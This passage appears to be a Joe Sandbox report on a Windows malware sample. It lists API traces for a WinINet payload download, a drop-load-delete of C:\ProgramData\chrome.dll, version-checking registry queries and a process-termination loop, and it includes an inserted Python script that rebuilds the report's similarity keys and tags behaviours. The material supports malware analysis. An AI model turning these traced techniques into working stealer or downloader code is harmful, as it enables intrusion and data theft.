                                              • Opcode Fuzzy Hash: 754e135dd435b5109bd89d6f633deaab1f2fe0ec03a021116c7625d90a29a748
                                              • Instruction Fuzzy Hash: B03162B1E04118DFDB04EBE4DC94DFE7776AB94305F105619E102E72A0EB74BA85CBA2
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 04845281
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04845288
                                              • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 048452A1
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 048452C8
                                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 048452F8
                                              • memcpy.MSVCRT(00000000,?,00000001), ref: 04845341
                                              • InternetCloseHandle.WININET(?), ref: 04845370
                                              • InternetCloseHandle.WININET(?), ref: 0484537D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                              • String ID:
                                              • API String ID: 1008454911-0
                                              • Opcode ID: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                              • Instruction ID: df31909730d173c7ae592bf29da5e395b12f569adcc4de071f4a8cf0a82489e0
                                              • Opcode Fuzzy Hash: 9d9a8564c17c37c6ab9290f4ff10c49815d7cff8932d35ae010a82ac5e0e1cea
                                              • Instruction Fuzzy Hash: 8C31F8B4A4421CABDB24CF54DC85BDCB7B5AB48304F5086D9FB09A7280D7B06AC58F59
                                              APIs
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • StrCmpCA.SHLWAPI(00000000,004210B0,00000000), ref: 04855AFB
                                              • StrCmpCA.SHLWAPI(00000000,004210B8), ref: 04855B58
                                              • StrCmpCA.SHLWAPI(00000000,004210C8), ref: 04855D0E
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 048556A7: StrCmpCA.SHLWAPI(00000000,00421074), ref: 048556DF
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04855777: StrCmpCA.SHLWAPI(00000000,00421084,00000000), ref: 048557CF
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 048557E6
                                                • Part of subcall function 04855777: StrStrA.SHLWAPI(00000000,00000000), ref: 0485581B
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 0485583A
                                                • Part of subcall function 04855777: strtok.MSVCRT(00000000,?), ref: 04855855
                                                • Part of subcall function 04855777: lstrlen.KERNEL32(00000000), ref: 04855865
                                              • StrCmpCA.SHLWAPI(00000000,004210C0,00000000), ref: 04855C42
                                              • StrCmpCA.SHLWAPI(00000000,004210D0,00000000), ref: 04855DF7
                                              • StrCmpCA.SHLWAPI(00000000,004210D8), ref: 04855EC3
                                              • Sleep.KERNEL32(0000EA60), ref: 04855ED2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                              • String ID:
                                              • API String ID: 3630751533-0
                                              • Opcode ID: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                              • Instruction ID: f3b4d7bcc7318eff7ecc5a4129c7285ed4a16ff0ac828a56ff15be3e235a3290
                                              • Opcode Fuzzy Hash: 0eb3445eed1b3daeda1f2162748cb05894813a744caa4cc26cce728cb2d7be17
                                              • Instruction Fuzzy Hash: EFE12431900108ABDB18FBA8DC95EED7379AF54204F404B6DE846E60A4EFB57F48CB52
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                              • StrCmpCA.SHLWAPI(00000000,02C9ED00), ref: 00410922
                                              • StrCmpCA.SHLWAPI(00000000,02C9EDE0), ref: 00410B79
                                              • StrCmpCA.SHLWAPI(00000000,02C9EC60), ref: 00410A0C
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                              Strings
                                              • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                              • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                              • API String ID: 585553867-663540502
                                              • Opcode ID: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                              • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                              • Opcode Fuzzy Hash: bc4131eb9470a0b30c78486560b6eeb5eaf7b01ec90574bc2a426dfa5c06d41b
                                              • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                              APIs
                                              • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                              • memset.MSVCRT ref: 0040A60B
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memcmp$AllocLocallstrcpymemset
                                              • String ID: @$v10$v20
                                              • API String ID: 631489823-278772428
                                              • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                              • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                              • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                              • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                              APIs
                                              • memset.MSVCRT ref: 0484158E
                                                • Part of subcall function 04841507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0484151B
                                                • Part of subcall function 04841507: RtlAllocateHeap.NTDLL(00000000), ref: 04841522
                                                • Part of subcall function 04841507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0484153E
                                                • Part of subcall function 04841507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0484155C
                                                • Part of subcall function 04841507: RegCloseKey.ADVAPI32(?), ref: 04841566
                                              • lstrcat.KERNEL32(?,00000000), ref: 048415B6
                                              • lstrlen.KERNEL32(?), ref: 048415C3
                                              • lstrcat.KERNEL32(?,00426414), ref: 048415DE
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 048416CC
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                              • DeleteFileA.KERNEL32(00000000), ref: 04841756
                                              • memset.MSVCRT ref: 0484177D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                              • String ID:
                                              • API String ID: 3885987321-0
                                              • Opcode ID: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                              • Instruction ID: 71a52272b9adc187cc44fb0632e0e780ba3f25f531c2f71bb1ed0fdcb05e1171
                                              • Opcode Fuzzy Hash: 9501ecd15ebe4f0bd675d82c20a0d288bf0466f34ff5fe808b0cf600256a10e0
                                              • Instruction Fuzzy Hash: 375143B1D4021857DB59FB64DC94FED73389F54305F404BE9AA09A20A0EFB06B88CF56
                                              APIs
                                              • lstrcatA.KERNEL32(?,02CA5298,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                              • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                              • lstrcatA.KERNEL32(?,02CA0E20), ref: 00414A97
                                              • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                              • lstrcatA.KERNEL32(?,02CA5FB0), ref: 00414ABF
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                                • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                              • String ID:
                                              • API String ID: 167551676-0
                                              • Opcode ID: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                              • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                              • Opcode Fuzzy Hash: 58dba1b2860d6428ec47f78fe100ccd670a24cdb85e4827545ce54862c89c4bc
                                              • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                              APIs
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                              • wsprintfA.USER32 ref: 004185E9
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5A18,00000000,000F003F,?,00000400), ref: 0041867C
                                              • lstrlenA.KERNEL32(?), ref: 00418691
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5A00,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418798
                                              • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 3896182533-4073750446
                                              • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                              • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                              • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                              • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
                                              • Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
                                              • Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
                                              • CloseHandle.KERNEL32(00000000), ref: 00419A79
                                              • CloseHandle.KERNEL32(0040A056), ref: 00419A88
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
                                              • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859C2C
                                              • Process32First.KERNEL32(0484A2BD,00000128), ref: 04859C40
                                              • Process32Next.KERNEL32(0484A2BD,00000128), ref: 04859C59
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 04859CB5
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 04859CD3
                                              • CloseHandle.KERNEL32(00000000), ref: 04859CE0
                                              • CloseHandle.KERNEL32(0484A2BD), ref: 04859CEF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 2696918072-0
                                              • Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction ID: 8c06c1e13651cbed66805d1922ab922f26e7698aeb969108356ef5582b55507f
                                              • Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
                                              • Instruction Fuzzy Hash: D2212CB4904218EBDB21DF55CC88BEDB7B9BB48304F0046C9E50AA72A0D774AF84CF91
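The per-function listings above (the WinINet download routine, the C:\ProgramData\chrome.dll drop-load-delete routine, and the Toolhelp32 process-termination loop that appears with the same Opcode ID in both the 0x400000 image and the 0x4840000 dump) are the raw material an analyst works from when comparing functions across reports. The script below is an added example, not Joe Sandbox code: it parses call lines in the format printed on this page, recomputes the "API ID" similarity key, and tags the behaviour each function shows. The CamelCase tokenisation and the stop-token list are inferred from the IDs printed on this page (assumption, not a documented algorithm), and the behaviour table is the editor's own heuristic. The three sample listings are copied from the report sections above.

```python
"""Parse Joe Sandbox per-function API listings, recompute the report's 'API ID'
similarity key and tag each function's behaviour.

The tokenisation and stop-token rules are inferred from the IDs printed in this
report; they are an assumption, not Joe Sandbox's documented algorithm.
"""
import re
from collections import Counter

# One call line, with or without the "Part of subcall function XXXX:" prefix,
# e.g. "• InternetReadFile.WININET(?,?,00000400,00000000), ref: 048452F8"
# or   "• task.LIBCPMTD ref: 048479C2" (no argument list).
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"([^\s.(]+)\.([A-Z0-9]+)(?:\(|\s+ref:)"
)
# Split an API name on CamelCase boundaries, keeping digits with their word:
# Process32First -> Process32, First; lstrcatA -> lstrcat, A.
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*")
# Tokens that never show up in the API IDs on this page (inferred stop list).
STOP = {"A", "C", "S", "H", "Get", "Reg", "Key", "Ex", "Str", "Cmp", "Url", "Rtl"}

# Constructed sample input: three listings copied from the report above.
KILL_LOOP = r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
• Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
• Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
• CloseHandle.KERNEL32(00000000), ref: 00419A79
• CloseHandle.KERNEL32(0040A056), ref: 00419A88
"""
DOWNLOADER = r"""
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 04845281
• RtlAllocateHeap.NTDLL(00000000), ref: 04845288
• InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 048452A1
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 048452C8
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 048452F8
• memcpy.MSVCRT(00000000,?,00000001), ref: 04845341
• InternetCloseHandle.WININET(?), ref: 04845370
• InternetCloseHandle.WININET(?), ref: 0484537D
"""
DLL_DROPPER = r"""
  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
  • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
  • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
• StrCmpCA.SHLWAPI(00000000,02C9ED00), ref: 00410922
• StrCmpCA.SHLWAPI(00000000,02C9EDE0), ref: 00410B79
• StrCmpCA.SHLWAPI(00000000,02C9EC60), ref: 00410A0C
  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
"""


def parse_calls(listing):
    """Return (api, module) pairs for every call line, subcall lines included."""
    return [m.group(1, 2) for m in map(CALL_RE.search, listing.splitlines()) if m]


def tokens(api):
    """CamelCase tokens of one API name with the stop tokens removed.
    StrCmpCA therefore contributes nothing, matching the page's IDs."""
    return [t for t in TOKEN_RE.findall(api) if t not in STOP]


def api_id(calls):
    """Rebuild the report's API ID: tokens grouped by descending call count,
    ASCII-sorted inside a group (so 'File' precedes 'lstrcpy'), groups joined
    with '$'. Each call, including repeated ones, adds to the count."""
    counts = Counter(t for api, _ in calls for t in tokens(api))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Editor's own heuristic: a tag applies when the whole API set is present.
BEHAVIOURS = {
    "terminates processes found via Toolhelp32":
        {"CreateToolhelp32Snapshot", "Process32Next", "OpenProcess", "TerminateProcess"},
    "downloads a payload over WinINet": {"InternetOpenUrlA", "InternetReadFile"},
    "writes, loads and deletes a DLL": {"CreateFileA", "LoadLibraryA", "DeleteFileA"},
}


def behaviours(calls):
    """Sorted list of behaviour tags whose full API set occurs in the function."""
    seen = {api for api, _ in calls}
    return sorted(tag for tag, needed in BEHAVIOURS.items() if needed <= seen)


if __name__ == "__main__":
    for name, listing in (("kill loop", KILL_LOOP), ("downloader", DOWNLOADER),
                          ("dll dropper", DLL_DROPPER)):
        calls = parse_calls(listing)
        print(f"{name}: {api_id(calls)}  {behaviours(calls)}")
```

Because the key depends only on API names and call counts, it is stable across the packed image and the unpacked region, which is why the kill loop at 004199C5 and at 04859C2C carry the same API String ID above even though their Instruction IDs differ; the same property makes it a usable pivot when hunting for the routine in other samples' reports. C++ mangled names such as ??2@YAPAXI@Z are not handled by the tokeniser.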
                                              APIs
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ??2@$CrackInternetlstrlen
                                              • String ID: <
                                              • API String ID: 1683549937-4251816714
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                              • HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA14B8,00000000,00020119,00000000), ref: 0041786D
                                              • RegQueryValueExA.ADVAPI32(00000000,02CA5958,00000000,00000000,?,000000FF), ref: 0041788E
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00417898
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3466090806-2517555085
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 04857A9B
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04857AA2
                                              • RegOpenKeyExA.ADVAPI32(80000002,006D6D98,00000000,00020119,00000000), ref: 04857AD4
                                              • RegQueryValueExA.ADVAPI32(00000000,006D6E34,00000000,00000000,?,000000FF), ref: 04857AF5
                                              • RegCloseKey.ADVAPI32(00000000), ref: 04857AFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                              • String ID: Windows 11
                                              • API String ID: 3225020163-2517555085
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
                                              • HeapAlloc.KERNEL32(00000000), ref: 004178CB
                                              • RegOpenKeyExA.ADVAPI32(80000002,02CA14B8,00000000,00020119,00417849), ref: 004178EB
                                              • RegQueryValueExA.ADVAPI32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
                                              • RegCloseKey.ADVAPI32(00417849), ref: 00417914
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
